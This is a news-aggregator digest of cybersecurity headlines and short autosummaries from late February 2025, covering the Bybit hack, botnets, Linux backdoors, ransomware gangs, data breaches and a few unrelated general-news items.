    The U.S. Federal Bureau of Investigation (FBI) formally linked the record-breaking $1.5 billion Bybit hack to North Korean threat actors, as the company’s CEO Ben Zhou declared a "war against Lazarus." The agency said the Democratic People’s Republic of Korea (North Korea) was responsible for the theft of the virtual assets from the cryptocurrency exchange, attributing it to a specific cluster

    Autosummary: Verichains noted that "the benign JavaScript file of app.safe.global appears to have been replaced with malicious code on February 19, 2025, at 15:29:25 UTC, specifically targeting Ethereum Multisig Cold Wallet of Bybit," and that the "attack was designed to activate during the next Bybit transaction, which occurred on February 21, 2025, at 14:13:35 UTC."


    Siemens Teamcenter vulnerability could allow account takeover (CVE-2025-23363)

    exploits
    2025-02-27 https://www.helpnetsecurity.com/2025/02/27/siemens-teamcenter-vulnerability-could-allow-account-takeover-cve-2025-23363/

    A high-severity vulnerability (CVE-2025-23363) in the Siemens Teamcenter product lifecycle management (PLM) software could allow an attacker to steal users’ valid session data and gain unauthorized access to the vulnerable application. About CVE-2025-23363 Siemens Teamcenter is a suite of applications that is used by businesses to manage the entire lifecycle of a product, from initial concept to design, manufacturing, service, and eventual disposal. CVE-2025-23363 is an open redirect vulnerability in Teamcenter’s single sign-on (SSO) login … More

    The post Siemens Teamcenter vulnerability could allow account takeover (CVE-2025-23363) appeared first on Help Net Security.




    PolarEdge Botnet Exploits Cisco and Other Flaws to Hijack ASUS, QNAP, and Synology Devices

    exploits
    2025-02-27 https://thehackernews.com/2025/02/polaredge-botnet-exploits-cisco-and.html
    A new malware campaign has been observed targeting edge devices from Cisco, ASUS, QNAP, and Synology to rope them into a botnet named PolarEdge since at least the end of 2023. French cybersecurity company Sekoia said it observed the unknown threat actors leveraging CVE-2023-20118 (CVSS score: 6.5), a critical security flaw impacting Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and

    Autosummary: It comes with capabilities to clean up log files, terminate suspicious processes, download a malicious payload named "t.tar" from 119.8.186[.]227, execute a binary named "cipher_log" extracted from the archive, establish persistence by modifying a file named "/etc/flash/etc/cipher.sh" to run the "cipher_log" binary repeatedly, and execute "cipher_log," the TLS backdoor. Codenamed PolarEdge, the malware enters an infinite loop, establishing a TLS session as well as spawning a child process to manage client requests and execute commands using exec_command.


    Cellebrite blocked Serbia from using its solution because misuse of the equipment for political reasons

    Linux
    2025-02-27 https://securityaffairs.com/174707/intelligence/cellebrite-blocked-serbia-from-using-its-solution-because-misuse-of-the-equipment-for-political-reasons.html
    Cellebrite blocked Serbia from using its solution after reports that police used it to unlock and infect the phones of a journalist and activist. A report published by Amnesty International in December 2024 documented the use of Cellebrite’s forensics tools by Serbian police to unlock and install spyware on the phones of a local journalist and […]

    Autosummary: Second, the analysis revealed a previously undetected spyware, named “NoviSpy,” which can extract personal data, activate the device’s microphone or camera, and was installed during police possession of his phone. “Serbian police and intelligence authorities are using advanced phone spyware alongside mobile phone forensic products to unlawfully target journalists, environmental activists and other individuals in a covert surveillance campaign, a new Amnesty International report has revealed,” reported Amnesty International. “Serbia’s police said in a statement that the Amnesty report is ‘absolutely incorrect,’ but also added that ‘the forensic tool is used in the same way by other police forces around the world,’” reported the Associated Press.


    DragonForce Ransomware group is targeting Saudi Arabia

    exploits ransomware
    2025-02-27 https://securityaffairs.com/174717/cyber-crime/dragonforce-ransomware-group-is-targeting-saudi-arabia.html
    Resecurity researchers reported that DragonForce ransomware targets Saudi organizations, raising cyber threats in the region. DragonForce ransomware has recently been reported to target organizations in the Kingdom of Saudi Arabia (KSA). A significant incident identified by Resecurity involved a data leak from a prominent real estate and construction company in Riyadh, which has projects with […]

    Autosummary: Pierluigi Paganini, February 27, 2025. Resecurity researchers reported that DragonForce ransomware targets Saudi organizations, raising cyber threats in the region.


    2024 phishing trends tell us what to expect in 2025

    financial
    2025-02-27 https://www.helpnetsecurity.com/2025/02/27/2024-phishing-trends-what-to-expect-in-2025/

    Phishing has been the method most often employed by cybercriminals to achieve initial access to targeted organizations in 2024, according to risk advisory firm Kroll, which expects this trend to continue in 2025. But attackers have also increasingly been using valid accounts (i.e., credentials stolen via infostealers) and social engineering to get a foothold into targets’ systems and networks. “Social engineering tactics observed in 2024 included CEO-spoofing that takes advantage of artificial intelligence (AI) to … More

    The post 2024 phishing trends tell us what to expect in 2025 appeared first on Help Net Security.


    Autosummary: Organizations should also: use email security tools that can detect and block open redirect links in emails and QR code phishing; implement phishing-resistant authentication methods; reduce their attack surface by using creative conditional access control policies (e.g., limit the number of allowed MFA devices per user, or require extra authentication factors when authorizing MFA devices); and update IT help-desk policies and exception-handling procedures to prevent social engineering attacks aimed at enrolling or disabling MFA and unauthorized devices.


    Silver Fox APT Uses Winos 4.0 Malware in Cyber Attacks Against Taiwanese Organizations

    exploits
    2025-02-27 https://thehackernews.com/2025/02/silver-fox-apt-uses-winos-40-malware-in.html
    A new campaign is targeting companies in Taiwan with malware known as Winos 4.0 as part of phishing emails masquerading as the country’s National Taxation Bureau. The campaign, detected last month by Fortinet FortiGuard Labs, marks a departure from previous attack chains that have leveraged malicious game-related applications. "The sender claimed that the malicious file attached was a list of

    Autosummary: The component, described as a login module, is capable of taking screenshots, logging keystrokes, altering clipboard content, monitoring connected USB devices, running shellcode, and permitting the execution of sensitive actions (e.g., cmd.exe) when security prompts from Kingsoft Security and Huorong are displayed.


    Space Pirates Targets Russian IT Firms With New LuckyStrike Agent Malware

    exploits rusia-ucrania
    2025-02-27 https://thehackernews.com/2025/02/space-pirates-targets-russian-it-firms.html
    The threat actor known as Space Pirates has been linked to a malicious campaign targeting Russian information technology (IT) organizations with a previously undocumented malware called LuckyStrike Agent. The activity was detected in November 2024 by Solar, the cybersecurity arm of Russian state-owned telecom company Rostelecom. It’s tracking the activity under the name Erudite Mogwai. The

    Autosummary: In one of the attacks targeting a government sector customer, Solar said it discovered the attacker deploying various tools to facilitate reconnaissance, while also dropping LuckyStrike Agent, a multi-functional .NET backdoor that uses Microsoft OneDrive for command-and-control (C2).


    New TgToxic Banking Trojan Variant Evolves with Anti-Analysis Upgrades

    financial exploits
    2025-02-27 https://thehackernews.com/2025/02/new-tgtoxic-banking-trojan-variant.html
    Cybersecurity researchers have discovered an updated version of an Android malware called TgToxic (aka ToxicPanda), indicating that the threat actors behind it are continuously making changes in response to public reporting. "The modifications seen in the TgToxic payloads reflect the actors’ ongoing surveillance of open source intelligence and demonstrate their commitment to enhancing the

    Autosummary: Then in November 2024, Italian online fraud prevention firm Cleafy detailed an updated variant with wide-ranging data-gathering features, while also expanding its operational scope to include Italy, Portugal, Hong Kong, Spain, and Peru.


    Trump cancels oil deal in major blow to Venezuela

    industry
    2025-02-27 https://www.bbc.com/news/articles/c62zzv02r3vo
    The US president said Venezuela had not lived up to its promises on taking back deported migrants.



    Microsoft names cybercriminals behind AI deepfake network

    ciber
    2025-02-27 https://www.bleepingcomputer.com/news/microsoft/microsoft-names-cybercriminals-behind-ai-deepfake-network/
    Microsoft has named multiple threat actors part of a cybercrime gang accused of developing malicious tools capable of bypassing generative AI guardrails to generate celebrity deepfakes and other illicit content. [...]



    Warning issued as hackers offer firms fake cybersecurity audits to break into their systems

    ciber
    2025-02-27 https://www.tripwire.com/state-of-security/beware-fake-cybersecurity-audits-cybercriminals-use-scams-breach-corporate
    Companies are being warned that malicious hackers are using a novel technique to break into businesses - by pretending to offer audits of the company’s cybersecurity. Read more in my article on the Tripwire State of Security blog.

    Autosummary: The genuine CERT-UA explained in its warning that, in some cases, it does use remote access software (such as AnyDesk) to assist in the defence of organisations, only after prior agreement through pre-agreed communications channels.


    Vo1d malware botnet grows to 1.6 million Android TVs worldwide

    exploits
    2025-02-27 https://www.bleepingcomputer.com/news/security/vo1d-malware-botnet-grows-to-16-million-android-tvs-worldwide/
    A new variant of the Vo1d malware botnet has grown to 1,590,299 infected Android TV devices across 226 countries, recruiting devices as part of anonymous proxy server networks. [...]

    Autosummary: As of February 2025, nearly 25% of the infections impact Brazilian users, followed by devices in South Africa (13.6%), Indonesia (10.5%), Argentina (5.3%), Thailand (3.4%), and China (3.1%). [Figure: Vo1d botnet size over time; source: XLab] The Vo1d botnet is one of the largest seen in recent years, surpassing Bigpanzi, the original Mirai operation, and the botnet responsible for a record-breaking 5.6 Tbps DDoS attack handled by Cloudflare last year.


    CISA Adds Microsoft and Zimbra Flaws to KEV Catalog Amid Active Exploitation

    exploits
    2025-02-26 https://thehackernews.com/2025/02/cisa-adds-microsoft-and-zimbra-flaws-to.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added two security flaws impacting Microsoft Partner Center and Synacor Zimbra Collaboration Suite (ZCS) to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The vulnerabilities in question are as follows - CVE-2024-49035 (CVSS score: 8.7) - An improper access control



    Hundreds of GitHub repos served up malware for years

    exploits
    2025-02-26 https://www.helpnetsecurity.com/2025/02/26/gitvenom-campaign-hundreds-of-github-repos-served-up-malware-for-years/

    Kaspersky researchers have unearthed an extensive and long-running malware delivery campaign that exploited users’ propensity for downloading code from GitHub and using it without first verifying whether it’s malicious. “Over the course of the GitVenom campaign, the threat actors behind it have created hundreds of repositories on GitHub that contain fake projects with malicious code – for example, an automation instrument for interacting with Instagram accounts, a Telegram bot allowing to manage Bitcoin wallets, and … More

    The post Hundreds of GitHub repos served up malware for years appeared first on Help Net Security.


    Autosummary: “Over the course of the GitVenom campaign, the threat actors behind it have created hundreds of repositories on GitHub that contain fake projects with malicious code – for example, an automation instrument for interacting with Instagram accounts, a Telegram bot allowing to manage Bitcoin wallets, and a hacking tool for the video game Valorant,” Kaspersky researchers Georgy Kucherin and João Godinho explained.


    Seal OS fixes vulnerabilities in Linux operating systems

    Linux
    2025-02-26 https://www.helpnetsecurity.com/2025/02/26/seal-os/

    Seal Security launched Seal OS, a solution designed to automatically fix vulnerabilities in both Linux operating systems and application code. Seal OS delivers long-term support for a wide range of Linux distributions, encompassing Red Hat Enterprise Linux, CentOS, Oracle Linux, Debian, Ubuntu, Alpine and more. This support extends to various deployment models, including containers, virtual machines, and bare metal installations. By addressing 99% of Linux vulnerabilities and application code issues, Seal OS provides a solution … More

    The post Seal OS fixes vulnerabilities in Linux operating systems appeared first on Help Net Security.


    Autosummary: Seal OS delivers long-term support for a wide range of Linux distributions, encompassing Red Hat Enterprise Linux, CentOS, Oracle Linux, Debian, Ubuntu, Alpine and more.


    New Linux Malware ‘Auto-Color’ Grants Hackers Full Remote Access to Compromised Systems

    exploits Linux
    2025-02-26 https://thehackernews.com/2025/02/new-linux-malware-auto-color-grants.html
    Universities and government organizations in North America and Asia have been targeted by a previously undocumented Linux malware called Auto-Color between November and December 2024, according to new findings from Palo Alto Networks Unit 42. "Once installed, Auto-color allows threat actors full remote access to compromised machines, making it very difficult to remove without specialized

    Autosummary: Once launched with root privileges, it proceeds to install a malicious library implant named "libcext.so.2," copies and renames itself to /var/log/cross/auto-color, and makes modifications to "/etc/ld.preload" for establishing persistence on the host.


    U.S. CISA adds Microsoft Partner Center and Synacor Zimbra Collaboration Suite flaws to its Known Exploited Vulnerabilities catalog

    exploits
    2025-02-26 https://securityaffairs.com/174664/security/u-s-cisa-adds-microsoft-partner-center-and-synacor-zimbra-collaboration-suite-flaws-to-its-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Microsoft Partner Center and Synacor Zimbra Collaboration Suite vulnerabilities to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added SonicWall SonicOS and Palo Alto PAN-OS vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. The two vulnerabilities are: The first vulnerability, CVE-2023-34192 (CVSS score: 9.0), is […]



    EncryptHub breaches 618 orgs to deploy infostealers, ransomware

    exploits ransomware
    2025-02-26 https://www.bleepingcomputer.com/news/security/encrypthub-breaches-618-orgs-to-deploy-infostealers-ransomware/
    A threat actor tracked as "EncryptHub," aka Larva-208, has been targeting organizations worldwide with spear-phishing and social engineering attacks to gain access to corporate networks. [...]

    Autosummary: Some of the keywords in file names that are targeted include "pass", "account", "auth", "2fa", "wallet", "seedphrase", "recovery", "keepass", "secret", and many others. In samples of the scripts seen by BleepingComputer, the threat actor attempts to steal a large amount of data from breached systems, including: data from various cryptocurrency wallets, including MetaMask, Ethereum Wallet, Coinbase Wallet, Trust Wallet, Opera Wallet, Brave Wallet, TronLink, Trezor Wallet, and many others.


    Australian IVF giant Genea breached by Termite ransomware gang

    exploits ransomware
    2025-02-26 https://www.bleepingcomputer.com/news/security/australian-ivf-giant-genea-breached-by-termite-ransomware-gang/
    The Termite ransomware gang has claimed responsibility for breaching and stealing sensitive healthcare data belonging to Genea patients, one of Australia’s largest fertility services providers. [...]

    Autosummary: The ongoing investigation also discovered that Genea’s compromised patient management systems contained the following types of personal and health data, with the exposed information varying for each affected individual: full names, emails, addresses, phone numbers, date of birth, emergency contacts, and next of kin; Medicare card numbers, private health insurance details, Defence DA numbers, medical record numbers, patient numbers; medical history, diagnoses and treatments, medications and prescriptions, patient health questionnaire, pathology and diagnostic test results, notes from doctors and specialists, appointment details, and schedules.


    What cybersecurity pros read for fun

    ciber
    2025-02-26 https://www.helpnetsecurity.com/2025/02/26/cybersecurity-fiction-books/

    While cybersecurity pros spend much of their time immersed in technical reports, risk assessments, and policy documents, fiction offers a refreshing perspective on security and hacking. Great cyber-themed novels can teach lessons on human psychology, cyber warfare, and the ethics of technology while also entertaining and thought-provoking. Here are eight fiction books that every cybersecurity leader should consider adding to their reading list. Daemon – Daniel Suarez Why read it? → Explores the potential dangers … More

    The post What cybersecurity pros read for fun appeared first on Help Net Security.


    Autosummary: As law enforcement, hackers, and intelligence agencies struggle to contain the daemon’s impact, the book raises real-world concerns about AI, automation, and cybersecurity threats. Russinovich, an expert in Windows security and malware analysis, delivers an authentic portrayal of cyber threats, malware attacks, and incident response.


    Leaked Black Basta Ransomware Chat Logs Reveal Inner Workings and Internal Conflicts

    exploits ransomware
    2025-02-26 https://thehackernews.com/2025/02/leaked-black-basta-chat-logs-reveal.html
    More than a year’s worth of internal chat logs from a ransomware gang known as Black Basta have been published online in a leak that provides unprecedented visibility into their tactics and internal conflicts among its members. The Russian-language chats on the Matrix messaging platform between September 18, 2023, and September 28, 2024, were initially leaked on February 11, 2025, by an

    Autosummary: The group has been observed rotating its ransomware executable payloads, switching file extensions for encrypted files, and modifying ransom note text, leading to the group being called by other names such as Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture. YY is another administrator of Black Basta who is involved in support tasks; Trump is one of the aliases for "the group’s main boss" Oleg Nefedov, who goes by the names GG and AA; Trump and another individual, Bio, worked together in the now-dismantled Conti ransomware scheme; one of the Black Basta affiliates is believed to be a minor aged 17 years; Black Basta has begun to actively incorporate social engineering into their attacks following the success of Scattered Spider. According to Qualys, the Black Basta group leverages known vulnerabilities, misconfigurations, and insufficient security controls to obtain initial access to target networks.


    Chile power cut: "We were trapped like sardines in the dark"

    latam
    2025-02-26 https://www.bbc.com/news/articles/c3w182z9868o
    Millions of people in Chile had their routines disrupted by an almost nationwide power cut.

    Autosummary: Vanessa Buschschlüter, BBC News. [Image, Reuters: Thousands of people had to make their way home after the Viña del Mar festival was suspended] More than eight million households across Chile were left without power on Tuesday afternoon after an electricity transmission line failed, cutting off the electricity supply to much of the country.


    Pump.fun X account hacked to promote scam governance token

    financial
    2025-02-26 https://www.bleepingcomputer.com/news/security/pumpfun-x-account-hacked-to-promote-scam-governance-token/
    The immensely popular memecoin generator Pump.fun had its X account hacked to promote a fake "PUMP" token cryptocurrency scam. [...]



    Hackers Exploited Krpano Framework Flaw to Inject Spam Ads on 350+ Websites

    exploits
    2025-02-26 https://thehackernews.com/2025/02/hackers-exploited-krpano-framework-flaw.html
    A cross-site scripting (XSS) vulnerability in a virtual tour framework has been weaponized by malicious actors to inject malicious scripts across hundreds of websites with the goal of manipulating search results and fueling a spam ads campaign at scale. Security researcher Oleg Zaytsev, in a report shared with The Hacker News, said the campaign – dubbed 360XSS – affected over 350 websites,

    Autosummary: Security researcher Oleg Zaytsev, in a report shared with The Hacker News, said the campaign – dubbed 360XSS – affected over 350 websites, including government portals, U.S. state government sites, American universities, major hotel chains, news outlets, car dealerships, and several Fortune 500 companies.


    Southern Water says Black Basta ransomware attack cost £4.5M in expenses

    exploits ransomware
    2025-02-26 https://www.bleepingcomputer.com/news/security/southern-water-says-black-basta-ransomware-attack-cost-45m-in-expenses/
    United Kingdom water supplier Southern Water has disclosed that it incurred costs of £4.5 million ($5.7M) due to a cyberattack it suffered in February 2024. [...]



    GrassCall malware campaign drains crypto wallets via fake job interviews

    exploits
    2025-02-26 https://www.bleepingcomputer.com/news/security/grasscall-malware-campaign-drains-crypto-wallets-via-fake-job-interviews/
    A recent social engineering campaign targeted job seekers in the Web3 space with fake job interviews through a malicious "GrassCall" meeting app that installs information-stealing malware to steal cryptocurrency wallets. [...]

    Autosummary: [Image: GrassCall[.]net website; source: BleepingComputer] Cybersecurity researcher g0njxa, who has been tracking these threat actors, told BleepingComputer that the GrassCall website is a clone of a "Gatherum" website used in a previous campaign. "If a wallet is found, passwords are bruteforced and assets drained, and a payment is issued to the user who made the victim download the fake software," the researcher told BleepingComputer.


    New Ghostwriter campaign targets Ukrainian Government and opposition activists in Belarus

    government
    2025-02-26 https://securityaffairs.com/174696/intelligence/ghostwriter-targets-ukrainian-gov-and-opposition-in-belarus.html
    A Ghostwriter campaign using a new variant of PicassoLoader targets opposition activists in Belarus, and Ukrainian military and government organizations. SentinelLABS observed a new Ghostwriter campaign targeting Belarusian opposition activists and Ukrainian military and government entities with a new variant of PicassoLoader. The campaign has been active since late 2024; threat actors used weaponized Microsoft […]

    Autosummary: Pierluigi Paganini, February 26, 2025. A Ghostwriter campaign using a new variant of PicassoLoader targets opposition activists in Belarus, and Ukrainian military and government organizations. The attack, likely tied to Belarus’ Jan 26, 2025 election, used an obfuscated VBA macro to execute malicious code.


    What an AI-generated video of Gaza reveals about Trump tactics

    industry
    2025-02-26 https://www.bbc.com/news/videos/cj675j69gxgo
    US President Donald Trump sparked a social media frenzy when he posted a video of Gaza generated by artificial intelligence on his site Truth Social. Marianna Spring has been analysing the online tactics of Trump and his team.



    Singapore’s biggest bank cuts roles as it embraces AI

    financial
    2025-02-25 https://www.bbc.com/news/articles/c4g7xn9y64po
    It makes DBS one of the first major banks to offer details on how AI will affect its operations.

    Autosummary: "We today deploy over 800 AI models across 350 use cases, and expect the measured economic impact of these to exceed S$1bn ($745m; £592m) in 2025," he added.


    Cybersecurity jobs available right now: February 25, 2025

    ciber
    2025-02-25 https://www.helpnetsecurity.com/2025/02/25/cybersecurity-jobs-available-right-now-february-25-2025/

    Application Security Engineer – Binance | UAE | Remote. As an Application Security Engineer, you will enhance and maintain the security postures of Binance’s affiliates specializing in DeFi and Web3. Serve as the first responder for security issues identified through penetration tests, bug bounty programs, and assessments. Analyze penetration test findings and implement code-level solutions to resolve vulnerabilities. Application Security Engineer – TheFork | France | On-site. As an … More

    The post Cybersecurity jobs available right now: February 25, 2025 appeared first on Help Net Security.


    Autosummary: Oversee and, when necessary, contribute to the configuration and operation of a comprehensive suite of security tools and technologies, including firewalls, IDS/IPS, WAF, proxies, email security, DLP, IRM/DRM, ATP, network infrastructure, and endpoint protection solutions. Specialist – Network Security – Eaton | USA | Remote. As a Specialist – Network Security, you will monitor technology, platform, and systems to ensure required performance, availability, and capacity. Security Engineer – Offensive Security – TikTok | United Kingdom | On-site. As a Security Engineer – Offensive Security, you will conduct vulnerability research of the most critical systems of core product ecosystems such as TikTok, TikTok LIVE, Lemon8, and others. Senior IT Security Specialist – Röchling Automotive | Italy | On-site. As a Senior IT Security Specialist, you will develop, implement and keep updated security policies, protocols, and procedures.


    FatalRAT Phishing Attacks Target APAC Industries Using Chinese Cloud Services

    financial
    2025-02-25 https://thehackernews.com/2025/02/fatalrat-phishing-attacks-target-apac.html
    Various industrial organizations in the Asia-Pacific (APAC) region have been targeted as part of phishing attacks designed to deliver a known malware called FatalRAT. "The threat was orchestrated by attackers using legitimate Chinese cloud content delivery network (CDN) myqcloud and the Youdao Cloud Notes service as part of their attack infrastructure," Kaspersky ICS CERT said in a Monday

    Autosummary: The activity has singled out government agencies and industrial organizations, particularly manufacturing, construction, information technology, telecommunications, healthcare, power and energy, and large-scale logistics and transportation, in Taiwan, Malaysia, China, Japan, Thailand, South Korea, Singapore, the Philippines, Vietnam, and Hong Kong.


    Two Actively Exploited Security Flaws in Adobe and Oracle Products Flagged by CISA

    exploits
    2025-02-25 https://thehackernews.com/2025/02/two-actively-exploited-security-flaws.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two security flaws impacting Adobe ColdFusion and Oracle Agile Product Lifecycle Management (PLM) to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The vulnerabilities in question are listed below - CVE-2017-3066 (CVSS score: 9.8) - A deserialization vulnerability impacting



    5 Active Malware Campaigns in Q1 2025

    exploits
    2025-02-25 https://thehackernews.com/2025/02/5-active-malware-campaigns-in-q1-2025.html
    The first quarter of 2025 has been a battlefield in the world of cybersecurity. Cybercriminals continued launching aggressive new campaigns and refining their attack methods. Below is an overview of five notable malware families, accompanied by analyses conducted in controlled environments. NetSupport RAT Exploiting the ClickFix Technique In early 2025, threat actors began exploiting a technique

    Autosummary: By submitting InvisibleFerret to ANY.RUN's Interactive Sandbox, we can analyze its behavior in real time: View InvisibleFerret analysis session InvisibleFerret behavior analyzed by ANY.RUN sandbox The malware starts by collecting system information, such as OS version, hostname, username, and geolocation, using services like ip-api.com, a method also used by cryptocurrency drainers. Credentials and personal data theft by Lumma Stealer InvisibleFerret: The Silent Threat Lurking in Fake Job Offers In a wave of social engineering attacks, cybercriminals have been leveraging InvisibleFerret, a stealthy Python-based malware, to compromise unsuspecting victims. Once executed, Lumma Stealer initiates additional malicious activities, including downloading and running other threats like SectopRAT, Vidar, Cobeacon, and additional Lumma Stealer variants. Key TTPs include: Persistence & Execution: Modifies registry startup keys, executes scripts via wscript.exe. Discovery: Reads computer name, checks system language, and accesses environment variables. View NetSupport RAT analysis session Malicious archive opened inside ANY.RUN sandbox When NetSupport RAT infects a system, it immediately establishes a connection with a command-and-control (C2) server, allowing attackers to operate the compromised machine remotely. Once installed, this RAT grants attackers full control over the victim's system, allowing activities such as real-time screen monitoring, file manipulation, and execution of arbitrary commands. AES encryption used by AsyncRAT Lumma Stealer: GitHub-Based Distribution In early 2025, cybersecurity experts uncovered a sophisticated campaign involving Lumma Stealer, an information-stealing malware.


    2,500+ Truesight.sys Driver Variants Exploited to Bypass EDR and Deploy HiddenGh0st RAT

    exploits
    2025-02-25 https://thehackernews.com/2025/02/2500-truesightsys-driver-variants.html
    A large-scale malware campaign has been found leveraging a vulnerable Windows driver associated with Adlice's product suite to sidestep detection efforts and deliver the Gh0st RAT malware. "To further evade detection, the attackers deliberately generated multiple variants (with different hashes) of the 2.0.2 driver by modifying specific PE parts while keeping the signature valid," Check Point

    Autosummary: "By modifying specific parts of the driver while preserving its digital signature, the attackers bypassed common detection methods, including the latest Microsoft Vulnerable Driver Blocklist and LOLDrivers detection mechanisms, allowing them to evade detection for months," Check Point said.


    GitVenom Malware Steals $456K in Bitcoin Using Fake GitHub Projects to Hijack Wallets

    exploits
    2025-02-25 https://thehackernews.com/2025/02/gitvenom-malware-steals-456k-in-bitcoin.html
    Cybersecurity researchers are calling attention to an ongoing campaign that's targeting gamers and cryptocurrency investors under the guise of open-source projects hosted on GitHub. The campaign, which spans hundreds of repositories, has been dubbed GitVenom by Kaspersky. "The infected projects include an automation instrument for interacting with Instagram accounts, a Telegram bot that enables

    Autosummary: "By hijacking YouTube accounts to impersonate professional players like s1mple, NiKo, and donk, cybercriminals are luring fans into fraudulent CS2 skin giveaways that result in stolen Steam accounts, cryptocurrency theft, and the loss of valuable in-game items," the Romanian cybersecurity company said.


    U.S. CISA adds Adobe ColdFusion and Oracle Agile PLM flaws to its Known Exploited Vulnerabilities catalog

    exploits
    2025-02-25 https://securityaffairs.com/174613/security/u-s-cisa-adds-adobe-coldfusion-and-oracle-agile-plm-flaws-to-its-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Adobe ColdFusion and Oracle Agile Product Lifecycle Management (PLM) vulnerabilities to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added SonicWall SonicOS and Palo Alto PAN-OS vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. The two vulnerabilities are: CVE-2017-3066 (CVSS score of 9.8) is a […]



    Russia warns financial sector organizations of IT service provider LANIT compromise

    financial Telcos
    2025-02-25 https://securityaffairs.com/174604/hacking/russia-warns-financial-sector-lanit-hack.html
    Russia’s NKTsKI warns financial sector organizations about a breach at major Russian IT service and software provider LANIT. Russia’s National Coordination Center for Computer Incidents (NKTsKI) warns the financial sector of a security breach at IT service and software provider LANIT, potentially affecting LANTER and LAN ATMservice. According to the security breach notification published by GosSOPKA, […]

    Autosummary: Founded in 1989, LANIT offers a wide range of IT solutions, including system integration, software development, cybersecurity, cloud services, and IT consulting.


    Background check provider data breach affects 3 million people who may not have heard of the company

    financial
    2025-02-25 https://www.malwarebytes.com/blog/news/2025/02/background-check-provider-data-breach-affects-3-million-people-who-may-not-have-heard-of-the-company
    Background check provider DISA has disclosed a major data breach which may have affected over 3 million people.

    Autosummary: Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. SSN Breached: yes. DISA states that it’s not aware of any attempts to abuse the stolen information: “While we are unaware of any attempted or actual misuse of any information involved in this incident, we are providing you with information about the incident and steps you can take to protect yourself, should you feel it necessary.”


    Halcyon RDR boosts ransomware protection for organizations

    exploits ransomware
    2025-02-25 https://www.helpnetsecurity.com/2025/02/25/halcyon-rdr-service/

    Halcyon announced Halcyon Ransomware Detection and Recovery (RDR), a no-cost integrated service that is now included with every deployment of the Halcyon Anti-Ransomware Platform. Most 24/7 threat monitoring and response services are not included with software platform purchases and are instead only offered at a significant additional cost. Halcyon offers 24/7 ransomware protection from a team of experts who investigate and respond to every single alert triggered in the Halcyon platform at no additional cost. … More

    The post Halcyon RDR boosts ransomware protection for organizations appeared first on Help Net Security.


    Autosummary: Halcyon RDR is powered by Halcyon RISE, an elite team of experts in ransomware TTPs, cryptography, threat intelligence, malware reverse engineering, and ransomware response.


    New Auto-Color Linux backdoor targets North American govts, universities

    Linux
    2025-02-25 https://www.bleepingcomputer.com/news/security/new-auto-color-linux-backdoor-targets-north-american-govts-universities/
    A previously undocumented Linux backdoor dubbed "Auto-Color" was observed in attacks between November and December 2024, targeting universities and government organizations in North America and Asia. [...]

    Autosummary: If the malware runs with root privileges, it installs a malicious library implant (libcext.so.2), disguised as the legitimate libcext.so.0 library, copies itself to a system directory (/var/log/cross/auto-color), and modifies "/etc/ld.preload" to ensure the implant executes before any other system library.


    US drug testing firm DISA says data breach impacts 3.3 million people

    financial
    2025-02-25 https://www.bleepingcomputer.com/news/security/us-drug-testing-firm-disa-says-data-breach-impacts-33-million-people/
    DISA Global Solutions, a leading US background screening and drug and alcohol testing firm, has suffered a data breach impacting 3.3 million people. [...]



    Background check, drug testing provider DISA suffers data breach

    financial
    2025-02-25 https://www.helpnetsecurity.com/2025/02/25/background-check-drug-testing-provider-disa-suffers-data-breach/

    DISA Global Solutions, a Texas-based company that provides employment screening services (including drug and alcohol testing and background checks) for over 55,000 organizations, has suffered a cyber incident that led to a data breach, which resulted in the potential compromise of personal and financial information of over 3.3 million individuals. What is known about the breach? DISA discovered the breach on April 22, 2024, and the subsequent investigation revealed that an unauthorized third party accessed … More

    The post Background check, drug testing provider DISA suffers data breach appeared first on Help Net Security.




    China-based Silver Fox spoofs healthcare app to deliver malware

    exploits
    2025-02-25 https://www.helpnetsecurity.com/2025/02/25/china-based-silver-fox-spoofs-healthcare-apps-dicom-viewer-to-deliver-valleyrat-malware/

    Silver Fox, a China-based threat actor that may or may not be backed by the Chinese government, has been delivering the ValleyRAT backdoor to unsuspecting users by disguising the malware as a legitimate healthcare app (the Philips DICOM viewer), a Windows text editor (EmEditor), and system drivers and utilities. The ValleyRAT malware: How the malware gets served to users is unknown. In previous attacks attributed to Silver Fox, the group has used SEO poisoning and / … More

    The post China-based Silver Fox spoofs healthcare app to deliver malware appeared first on Help Net Security.


    Autosummary: But, over the past year, they’ve also started focusing on a broader range of targets, including gamers; e-commerce, finance, sales, accounting, and management professionals / enterprises; and national institutions and security companies.


    Cybersecurity needs a leader, so let’s stop debating and start deciding

    ciber
    2025-02-25 https://www.helpnetsecurity.com/2025/02/25/cybersecurity-ownership/

    Have you ever heard anyone earnestly ask in a business, “Who owns legal?” or “Who sets the financial strategy?” Probably not – it should be obvious, right? Yet, when it comes to cybersecurity, the question of ownership still seems to spark endless debates. That might have been understandable back in the 1990s when key security roles like the CISO were still being ironed out. But these days, it should be a serious red flag. Security … More

    The post Cybersecurity needs a leader, so let’s stop debating and start deciding appeared first on Help Net Security.


    Autosummary: This means setting clear policies, defining risk tolerance and, most importantly, ensuring that security decisions are made based on actual business needs, not internal politics. Without clear governance, security efforts easily become reactive, disjointed, and prone to being overruled by whoever shouts the loudest in the boardroom. Yet, too often, security is still treated as an isolated function, left to operate in a vacuum. But the real issue isn’t just finding the right person; it’s ensuring they have the authority, resources, and business-wide support to execute effectively.


    LightSpy Expands to 100+ Commands, Increasing Control Over Windows, macOS, Linux, and Mobile

    Linux
    2025-02-25 https://thehackernews.com/2025/02/lightspy-expands-to-100-commands.html
